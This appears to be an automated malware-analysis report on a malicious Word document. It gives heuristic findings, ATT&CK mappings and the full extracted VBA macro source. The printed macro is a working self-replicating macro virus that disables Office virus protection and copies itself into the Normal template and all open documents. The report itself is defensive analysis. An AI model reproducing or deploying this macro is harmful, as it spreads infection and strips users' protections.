MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1027 Obfuscated Files or Information
The sample is a malicious Word document containing VBA macros. The macros are designed to disable Office macro protection and replicate themselves to other documents, indicating a self-spreading or evasive behavior. The ClamAV detection name 'Doc.Trojan.Thus-16' further supports its malicious nature. The document body content is unrelated to the malicious functionality.
Heuristics 4
-
ClamAV: Doc.Trojan.Thus-16 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-16
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Sub Document_Open() 'Mat1'
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1902 bytes |
SHA-256: 8d8ba71c3a08c7fbe87b79ab61cac4f5325348973bae677adf2be66816c3491f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
(1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
End Sub
'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.